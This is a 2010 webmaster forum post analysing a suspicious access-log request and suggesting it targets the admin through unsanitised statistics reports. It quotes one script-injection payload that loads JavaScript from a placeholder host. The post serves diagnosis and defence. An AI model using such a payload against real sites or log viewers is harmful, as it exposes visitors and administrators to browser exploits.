SteveWh - 1:15 am on Jun 23, 2010 (gmt 0)
Somewhat disorganized comments based on a longer second look...
"/question/index?qid=20100223114447AAUSrnf" is the URL format of a Yahoo Answers question, and, oddly enough, when plugged into the correct website address of YA, it is a real existing question.
Some "thinking out loud"...
GET /<sc<script src=http://example.com/x.js></script>
example.com is, as you said, an old exploit site from last summer. That JS code was injected into server pages or databases using various injection techniques, but that code was the injected content. In itself, it's not capable of compromising the server. That was done some other way. Once the code is in the site, its job is to launch browser exploits against people who visit the site.
Maybe this URL with the JS in it is an attack against you, via statistics software. If a stats program puts that text in a report of pages requested, but fails to properly sanitize HTML tags, then that script could launch the exploit against *you*, just from viewing the page containing the text, and it wouldn't matter what response code the server gave for the request. The point was to get the request into the access log, that's all.
Maybe try doing web searches to try to find pages with links to your site and also with references to that malicious domain.